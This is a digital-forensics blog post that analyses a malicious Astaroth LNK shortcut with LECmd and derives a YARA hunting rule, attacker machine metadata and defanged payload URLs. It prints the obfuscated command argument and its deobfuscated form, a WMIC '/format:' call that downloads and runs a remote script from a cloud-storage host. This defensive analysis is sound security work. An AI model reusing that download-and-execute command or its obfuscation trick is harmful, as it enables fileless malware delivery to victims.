<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <title>
        Deriving intelligence from LNK files - bit_of_hex
      </title>
    <head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport"
    content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  
  <meta name="theme-color" content="#000000" />
  
  <meta http-equiv="window-target" content="_top" />
  
  
  <meta name="description" content="LNK files have a healthy life in DFIR. There is good reason: they are so awesome for analysis. Whether it be linking a user to knowledge of a file, as part of a jump list, or in their use for malicious purposes. In regards to the latter, The MITRE ATT&amp;amp;CK framework describes this as the specific technique: &amp;lsquo;shortcut modification&amp;rsquo; (T1023) which is summarised as follows:
 Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process." />
  <meta name="generator" content="Hugo 0.68.3 with theme pure" />
  <title>Deriving intelligence from LNK files - bit_of_hex</title>
  
  
  <link rel="stylesheet" href="https://bitofhex.com/css/style.min.c4bc7071f132c964c2116bca53b392933f377e5ca7b7051ed245187c621a2d3e.css">
  
  <link rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/9.15.10/styles/github.min.css" async>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.css" async>
  <meta property="og:title" content="Deriving intelligence from LNK files" />
<meta property="og:description" content="LNK files have a healthy life in DFIR. There is good reason: they are so awesome for analysis. Whether it be linking a user to knowledge of a file, as part of a jump list, or in their use for malicious purposes. In regards to the latter, The MITRE ATT&amp;CK framework describes this as the specific technique: &lsquo;shortcut modification&rsquo; (T1023) which is summarised as follows:
 Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://bitofhex.com/2019/07/15/deriving-intelligence-from-lnk-files/" />
<meta property="article:published_time" content="2019-07-15T02:14:48+00:00" />
<meta property="article:modified_time" content="2019-07-15T02:14:48+00:00" />
<meta itemprop="name" content="Deriving intelligence from LNK files">
<meta itemprop="description" content="LNK files have a healthy life in DFIR. There is good reason: they are so awesome for analysis. Whether it be linking a user to knowledge of a file, as part of a jump list, or in their use for malicious purposes. In regards to the latter, The MITRE ATT&amp;CK framework describes this as the specific technique: &lsquo;shortcut modification&rsquo; (T1023) which is summarised as follows:
 Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.">
<meta itemprop="datePublished" content="2019-07-15T02:14:48&#43;00:00" />
<meta itemprop="dateModified" content="2019-07-15T02:14:48&#43;00:00" />
<meta itemprop="wordCount" content="1457">



<meta itemprop="keywords" content="lnk files,malware,threat intelligence,cyberchef," /><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Deriving intelligence from LNK files"/>
<meta name="twitter:description" content="LNK files have a healthy life in DFIR. There is good reason: they are so awesome for analysis. Whether it be linking a user to knowledge of a file, as part of a jump list, or in their use for malicious purposes. In regards to the latter, The MITRE ATT&amp;CK framework describes this as the specific technique: &lsquo;shortcut modification&rsquo; (T1023) which is summarised as follows:
 Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process."/>

  <!--[if lte IE 9]>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
    <![endif]-->

  <!--[if lt IE 9]>
      <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
      <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
    <![endif]-->

</head>
  </head>

  
  

  <body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage"><header class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="slimContent">
      <div class="navbar-header">
        <div class="profile-block text-center">
          <a id="avatar" href="https://twitter.com/mattnotmax" target="_blank">
            <img class="img-circle img-rotate" src="https://bitofhex.com/logo.png" width="200" height="200">
          </a>
          <h2 id="name" class="hidden-xs hidden-sm">bit_of_hex</h2>
          <h3 id="title" class="hidden-xs hidden-sm hidden-md">digital forensics | incident response</h3>
          <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i>Melbourne, Australia</small>
        </div><div class="search" id="search-form-wrap">
    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="Search" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i
                        class="icon icon-search"></i></button>
            </span>
        </div>
        <div class="ins-search">
            <div class="ins-search-mask"></div>
            <div class="ins-search-container">
                <div class="ins-input-wrapper">
                    <input type="text" class="ins-search-input" placeholder="Type something..."
                        x-webkit-speech />
                    <button type="button" class="close ins-close ins-selectable" data-dismiss="modal"
                        aria-label="Close"><span aria-hidden="true">×</span></button>
                </div>
                <div class="ins-section-wrapper">
                    <div class="ins-section-container"></div>
                </div>
            </div>
        </div>
    </form>
</div>
        <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
          <span class="sr-only">Toggle navigation</span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
      </div>
      <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
        <ul class="nav navbar-nav main-nav">
            <li class="menu-item menu-item-home">
                <a href="/">
                    <i class="icon icon-home-fill"></i>
                  <span class="menu-title">Home</span>
                </a>
            </li>
            <li class="menu-item menu-item-resources">
                <a href="/resources/">
                    <i class="icon icon-project"></i>
                  <span class="menu-title">Resources</span>
                </a>
            </li>
            <li class="menu-item menu-item-archives">
                <a href="/posts/">
                    <i class="icon icon-archives-fill"></i>
                  <span class="menu-title">Archives</span>
                </a>
            </li>
            <li class="menu-item menu-item-tags">
                <a href="/tags/">
                    <i class="icon icon-tags"></i>
                  <span class="menu-title">Tags</span>
                </a>
            </li>
            <li class="menu-item menu-item-about">
                <a href="/about/">
                    <i class="icon icon-cup-fill"></i>
                  <span class="menu-title">About</span>
                </a>
            </li>
        </ul>
      </nav>
    </div>
  </header>

<aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      
<div class="widget">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget-body">
        <ul class="recent-post-list list-unstyled no-thumbnail">
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://bitofhex.com/2020/04/18/forensic-freebie/" class="title">Forensic Freebie with digitalforensics.io</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2020-04-18 10:53:26 &#43;0000 UTC" itemprop="datePublished">2020-04-18</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://bitofhex.com/2020/02/10/sapphire-mushroom-lnk-files/" class="title">Suspected Sapphire Mushroom (APT-C-12) malicious LNK files</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2020-02-10 23:54:19 &#43;0000 UTC" itemprop="datePublished">2020-02-10</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://bitofhex.com/2019/11/17/say-cheese-an-analysis-of-foto-lnk/" class="title">&#34;Say Cheese!&#34; An analysis of foto.lnk</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2019-11-17 16:46:26 &#43;0000 UTC" itemprop="datePublished">2019-11-17</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://bitofhex.com/2019/07/15/deriving-intelligence-from-lnk-files/" class="title">Deriving intelligence from LNK files</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2019-07-15 02:14:48 &#43;0000 UTC" itemprop="datePublished">2019-07-15</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://bitofhex.com/2019/02/19/base64-encoded-signatures/" class="title">Base64 Encoded File Signatures</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2019-02-19 00:06:06 &#43;0000 UTC" itemprop="datePublished">2019-02-19</time>
                    </p>
                </div>
            </li>
        </ul>
    </div>
</div>
  </div>
</aside>

    
    
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <h4 class="toc-title">Catalogue</h4>
    <nav id="toc" class="js-toc toc">

    </nav>
  </div>
</aside>
<main class="main" role="main"><div class="content">
  <article id="-deriving-intelligence-from-lnk-files" class="article article-type-" itemscope
    itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      <h1 itemprop="name">
  <a
    class="article-title"
    href="/2019/07/15/deriving-intelligence-from-lnk-files/"
    >Deriving intelligence from LNK files</a
  >
</h1>

      <div class="article-meta">
        
<span class="article-date">
  <i class="icon icon-calendar-check"></i>&nbsp;
<a href="https://bitofhex.com/2019/07/15/deriving-intelligence-from-lnk-files/" class="article-date">
  <time datetime="2019-07-15 02:14:48 &#43;0000 UTC" itemprop="datePublished">2019-07-15</time>
</a>
</span>
  
  <span class="article-tag">
    <i class="icon icon-tags"></i>&nbsp;
    <a class="article-tag-link" href="/tags/lnk-files/"> lnk files </a>
    <a class="article-tag-link" href="/tags/malware/"> malware </a>
    <a class="article-tag-link" href="/tags/threat-intelligence/"> threat intelligence </a>
    <a class="article-tag-link" href="/tags/cyberchef/"> cyberchef </a>
  </span>

        <span class="post-comment"><i class="icon icon-comment"></i>&nbsp;<a href="/2019/07/15/deriving-intelligence-from-lnk-files/#comments"
            class="article-comment-link">Comments</a></span>
      </div>
    </div>
    <div class="article-entry marked-body js-toc-content" itemprop="articleBody">
      <p>LNK files have a healthy life in DFIR. There is good reason: they are so awesome for analysis. Whether it be linking a user to knowledge of a file, as part of a jump list, or in their use for malicious purposes. In regards to the latter, The MITRE ATT&amp;CK framework describes this as the specific technique: &lsquo;shortcut modification&rsquo; (<a href="https://attack.mitre.org/techniques/T1023/">T1023</a>) which is summarised as follows:</p>
<blockquote>
<p>Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use Masquerading to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</p>
</blockquote>
<p>Now it seems that LNK files are back (but, really, did they ever go?) On 8 July 2019, Microsoft released a blog post highlighting an <a href="https://attack.mitre.org/software/S0373/">Astaroth</a> malware campaign using, in part, a downloader in the form of a malicious LNK file: <em>certidao.htm.lnk</em>. I located a similar sample on Hybrid-Analysis <a href="https://www.hybrid-analysis.com/sample/82942e3356e6d3017e4952491d2a6d8ce5748cfd15387b5bcaaf45a3cb6cf35a?environmentId=120">here</a> (SHA256: 82942e3356e6d3017e4952491d2a6d8ce5748cfd15387b5bcaaf45a3cb6cf35a) and thought that I&rsquo;d take a look to see what intelligence could be derived from the LNK file alone.</p>
<div style="width: 50%; height: 50%; display: block; margin: 0 auto;" ><img src="/2019/07/so_hot_right_now.png" alt="so_hot_right_now" style="border: #000000 1px outset"></div>
<p>The juicy part of the LNK file is in the shortcut tab:</p>
<div style="width: 50%; height: 50%; display: block; margin: 0 auto;" ><img src="/2019/07/astaroth_shortcut.png" alt="astaroth_shortcut" style="border: #000000 1px outset"></div>
<p>Here we can see the &lsquo;Target&rsquo; (normally a direct reference to a file) is a snippet of code, the shortcut will run minimised, and the comment looks like gibberish. Pulling out the actual details of the shortcut using <a href="https://github.com/EricZimmerman/LECmd">LECmd</a> provides the following:</p>
<pre><code class="xml">--- Header ---
  Target created:  2010-11-21 03:24:03
  Target modified: 2010-11-21 03:24:03
  Target accessed: 2010-11-21 03:24:03

  File size: 302,592
  Flags: HasTargetIdList, HasLinkInfo, HasName, HasArguments, HasIconLocation, IsUnicode, HasExpString
  File attributes: FileAttributeArchive
  Icon index: 64
  Show window: SwShowminnoactive (Display the window as minimized without activating it.)

Name: zvvvje4d5777hiqt2369aIEFLHKnncxmvbvjhsj2567hgeet286daUFFLHrnccmxbbrh2j2667lguet986ddaUFIHJrnnmmxbihsjj466lgukk980ddWYIIHJrbmcx
Arguments:  /V /C "set x=C77jhd2766:\\77jhd2766W77jhd2766i77jhd2766nd77jhd2766ow77jhd2766s\\s77jhd2766ys77jhd2766te77jhd2766m377jhd2766277jhd2766\\77jhd2766w77jhd2766b77jhd2766e77jhd2766m\\W77jhd2766M77jhd2766I77jhd2766C.e77jhd2766x77jhd2766e o77jhd2766s g77jhd2766e77jhd2766t UF77jhd2766H77jhd2766K77jhd2766m77jhd2766xi77jhd2766h277jhd2766, fre77jhd2766evi77jhd2766r77jhd2766t77jhd2766u77jhd2766a77jhd2766l77jhd2766me77jhd2766mo77jhd2766ry77jhd2766 /77jhd2766fo77jhd2766rm77jhd2766at:"h77jhd2766t77jhd2766t77jhd2766p77jhd2766s77jhd2766:77jhd2766/77jhd2766/st77jhd2766o77jhd2766r77jhd2766ag77jhd2766e.77jhd2766go77jhd2766og77jhd2766lea77jhd2766pis77jhd2766.co77jhd2766m77jhd2766/77jhd2766a77jhd2766w77jhd2766s77jhd2766d77jhd2766x/77jhd27660977jhd2766/v77jhd2766.t77jhd2766xt77jhd2766#0277jhd276650177jhd27664q277jhd2766977jhd2766I77jhd2766S77jhd2766q77jhd2766c77jhd2766z77jhd2766v" &&echo %x:77jhd2766=%|%ComSpec%"
Icon Location: %SystemRoot%\system32\imageres.dll

--- Link information ---
Flags: VolumeIdAndLocalBasePath

>>Volume information
  Drive type: Fixed storage media (Hard drive)
  Serial number: 086F96AF
  Label: (No label)
  Local path: C:\Windows\System32\cmd.exe

--- Target ID information (Format: Type ==> Value) ---

  Absolute path: My Computer\C:\Windows\System32\cmd.exe

  -Root folder: GUID ==> My Computer

  -Drive letter ==> C:

  -Directory ==> Windows
    Short name: Windows
    Modified: 2019-04-30 20:34:24
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: Windows
    Created: 2009-07-14 03:20:10
    Last access: 2019-04-30 20:34:24
    MFT entry/sequence #: 671/1 (0x29F/0x1)

  -Directory ==> System32
    Short name: System32
    Modified: 2019-04-30 18:45:08
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: System32
    Created: 2009-07-14 03:20:12
    Last access: 2019-04-30 18:45:08
    MFT entry/sequence #: 2549/1 (0x9F5/0x1)

  -File ==> cmd.exe
    Short name: cmd.exe
    Modified: 2010-11-21 03:24:04
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: cmd.exe
    Created: 2010-11-21 03:24:04
    Last access: 2010-11-21 03:24:04
    MFT entry/sequence #: 20227/1 (0x4F03/0x1)

--- End Target ID information ---

--- Extra blocks information ---

>> Environment variable data block
   Environment variables: %ComSpec%

>> Special folder data block
   Special Folder ID: 37

>> Known folder data block
   Known folder GUID: 1ac14e77-02e7-4e5d-b744-2eb1ae5198b7 ==> System32

>> Property store data block (Format: GUID\ID Description ==> Value)
   46588ae2-4cbc-4338-bbfc-139326986dce\4 SID ==> S-1-5-21-814163198-2266970693-1875007973-1002

>> Tracker database block
   Machine ID: dedicado-web
   MAC Address: 00:26:b9:fd:e1:82
   MAC Vendor: DELL
   Creation: 2019-03-21 04:28:56

   Volume Droid: 8c78ff20-8b31-44de-bbba-eabca30a81ea
   Volume Droid Birth: 8c78ff20-8b31-44de-bbba-eabca30a81ea
   File Droid: d73dcd41-4b91-11e9-8dc8-0026b9fde182
   File Droid birth: d73dcd41-4b91-11e9-8dc8-0026b9fde182</code></pre>
<p>The full output provides a bunch of useful information. From an immediate incident response perspective, we&rsquo;d probably go straight to the block of obfuscated code and see what it&rsquo;s doing. From a glance it looks like a &lsquo;find/replace&rsquo; could clean it up substantially:</p>
<pre><code class="xml">Arguments:  /V /C "set x=C:\\Windows\\system32\\wbem\\WMIC.exe os get UFHKmxih2, freevirtualmemory /format:"https://storage.googleapis.com/awsdx/09/v.txt#025014q29ISqczv" &&echo %x:=%|%ComSpec%"</code></pre>
<h3 id="job-done">Job done?</h3>
<p>So, what else is there? We have the critical IOC of the path where the LNK file is pointing and we can pivot from there. The best thing about malicious LNK files are the metadata they contain about the attacker&rsquo;s infrastructure. In this case (amongst other interesting values):</p>
<pre><code class="xml">Serial number: 086F96AF
Machine ID: dedicado-web
MAC Address: 00:26:b9:fd:e1:82
MAC Vendor: DELL</code></pre>
<p>These values give information relating to the hardware of the attacker&rsquo;s infrastructure, including the NetBios name, &lsquo;dedicado-web&rsquo;, and the MAC address, &lsquo;00:26:b9:fd:e1:82&rsquo;.</p>
<p>Interestingly we can switch to open source intelligence (aka Google) and lookup &lsquo;dedicado-web&rsquo; which led me to a Brazilian VPS of the same name. It has links to the more well-known bulletproof provider OVH. This fits with the <a href="https://www.zdnet.com/article/microsoft-warns-about-astaroth-malware-campaign/">overwhelmingly Brazilian focus</a> of the Astaroth campaign.</p>
<div style="width: 100%; height: 100%; display: block; margin: 0 auto;" ><img src="/2019/07/dedicado-web.png" alt="dedicado-web" style="border: #000000 1px outset"></div>
<h3 id="yara-me-this">Yara me this&hellip;</h3>
<p>But the other data remains useful. Leveraging the data within the LNK file we can hunt for other samples of files that have the same &lsquo;<a href="http://windowsir.blogspot.com/2018/07/lnk-toolmarks.html">toolmarks</a>&rsquo; and see what we come up with. Here, my beginner Yara skills actually come in handy:</p>
<pre><code class="xml">rule Astaroth
{
	meta:
		author = "@mattnotmax"
		date = "2019-07-15"
		description = "LNK file with a unique MAC address or NETBIOS name in relation to a Astaroth campaign"
		reference = "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/"
        sample = "82942e3356e6d3017e4952491d2a6d8ce5748cfd15387b5bcaaf45a3cb6cf35a"
		
	strings:
		$mac = {00 26 B9 FD E1 82}
		$netbios = "dedicado-web" fullword ascii
		
	condition:
		uint16(0) == 0x4c and ($mac or $netbios)
}</code></pre>
<p>Searching on Hybrid-Analysis (aka poor man&rsquo;s Virus Total) gives a good result of 22 hits, of which 21 had shared samples. These were uploaded between 24 April 2019 and 11 June 2019.</p>
  <div style="width: 100%; height: 100%; display: block; margin: 0 auto;" ><img src="/2019/07/HA_results.png" alt="HA_results" style="border: #000000 1px outset"></div>  
<p>Some of these are tagged with #banload or #apt so the <em>may</em> not be relevant. Processing the group again with LECmd and they appear to be very consistent (edited for screen size):</p>
<style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg .tg-xldj{border-color:inherit;text-align:left}
.tg .tg-0pky{border-color:inherit;text-align:left;vertical-align:top}
</style>
<table class="tg">
  <tr>
    <th class="tg-xldj">Truncated Hash</th>
    <th class="tg-xldj">TargetCreated</th>
    <th class="tg-xldj">FileSize</th>
    <th class="tg-0pky">VolumeSerialNumber</th>
    <th class="tg-0pky">MachineID</th>
    <th class="tg-0pky">MachineMACAddress</th>
    <th class="tg-0pky">MACVendor</th>
  </tr>
  <tr>
    <td class="tg-xldj">018c35d8...fb1131f9</td>
    <td class="tg-xldj">2010-11-21 03:24:03</td>
    <td class="tg-xldj">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-xldj">0a810c66...301f9f5d</td>
    <td class="tg-xldj">2010-11-21 03:24:03</td>
    <td class="tg-xldj">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">12ad543a...63592ec5</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">ns237</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">1a6e71a8...6c4e2e00</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">441cd985...60b49a54</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">ns237</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">5694add6...2f1f7888</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">57603915...8bccc5a2</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">589fd0b6...277a0d87</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">5a7fb5e6...4a99e795</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">8156fd98...1df9b7ed</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">ns237</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">82942e33...cb6cf35a</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">862fcf17...5fed9048</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">98ffca4f...e720dc16</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">ab3a338d...fe030518</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">c783a629...15af9228</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">ca8757ed...b86eb751</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">ns237</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">cf67b1fb...9e93ec14</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">dde556d6...71c7ab44</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">dedicado-web</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">e2239cd4...e18d9dbd</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">ns237</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">e239a967...71a2c2ef</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">ns237</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
  <tr>
    <td class="tg-0pky">f2d0cdbf...044ccbb5</td>
    <td class="tg-0pky">2010-11-21 03:24:03</td>
    <td class="tg-0pky">302592</td>
    <td class="tg-0pky">086F96AF</td>
    <td class="tg-0pky">ns237</td>
    <td class="tg-0pky">00:26:b9:fd:e1:82</td>
    <td class="tg-0pky">DELL</td>
  </tr>
</table>
<p>The similar results in the above table is also matched in a review of the in-line code which has the same obfuscation as the first example. It&rsquo;s no secret I am a fan of CyberChef and using the forks, registers, and some regex the relevant URLs can be extracted from the in-line code:</p>
<pre><code class="xml">[{"op":"Fork","args":["\\n","\\n",true]},{"op":"Register","args":["(?<=echo %x:)(.*)(?=\\=)",true,false,false]},{"op":"Find / Replace","args":[{"option":"Regex","string":"$R0"},"",true,false,true,false]},{"op":"Find / Replace","args":[{"option":"Simple string","string":"[]"},"",true,false,true,false]},{"op":"Extract URLs","args":[false]},{"op":"Defang URL","args":[true,true,false,"Everything"]},{"op":"Remove whitespace","args":[true,true,true,true,true,false]}]</code></pre>
<p>Becomes&hellip;</p>
<pre><code class="xml">hxxp://storage[.]googleapis[.]com/midgoldem/09/v[.]txt#025040xiuj6rl9d
hxxp://storage[.]googleapis[.]com/midgoldem/09/v[.]txt#025070xbhj6luk0
hxxp://storage[.]googleapis[.]com/xmoabx/04/v[.]txt#025051IJrmxxmir
hxxp://e8aUHrmmr[.]intelcore-i1[.]website:25/9/?13825xmuj8luk
hxxp://storage[.]googleapis[.]com/midgoldem/06/v[.]txt#025038Knmbj2257
hxxps://storage[.]googleapis[.]com/awsdx/09/v[.]txt#025050nmble0aUH
hxxps://storage[.]googleapis[.]com/ultramaker/09/v[.]txt#025010bvrhj267l
hxxps://storage[.]googleapis[.]com/ultramaker/09/v[.]txt#025060xjuf7hrl3
hxxps://storage[.]googleapis[.]com/ultramaker/09/v[.]txt#025060aIUIHKrnc
hxxp://storage[.]googleapis[.]com/kodesca/08/v[.]txt#025028jd3ISnxvj
hxxps://storage[.]googleapis[.]com/awsdx/09/v[.]txt#025014q29ISqczv
hxxps://storage[.]googleapis[.]com/ultramaker/08/v[.]txt#025018ef7hil69I
hxxps://storage[.]googleapis[.]com/awsdx/09/v[.]txt#025060jsf7il36h
hxxp://storage[.]googleapis[.]com/teslaasth/09/v[.]txt#025050ELKqxmvjd
hxxps://storage[.]googleapis[.]com/awsdx/09/v[.]txt#0250800UHbcbrs4
hxxp://storage[.]googleapis[.]com/kodesca/09/v[.]txt#025091e6UHrcxvs
hxxp://q39ESqczv[.]intelcore-i5[.]site:25020/09/?138025020qixvj22h
hxxps://storage[.]googleapis[.]com/ultramaker/06/v[.]txt#0250906uk8dWUIJ
hxxp://storage[.]googleapis[.]com/kodesca/04/v[.]txt#025058il39ELvmd
hxxp://storage[.]googleapis[.]com/kodesca/06/v[.]txt#025022e986IJrmc
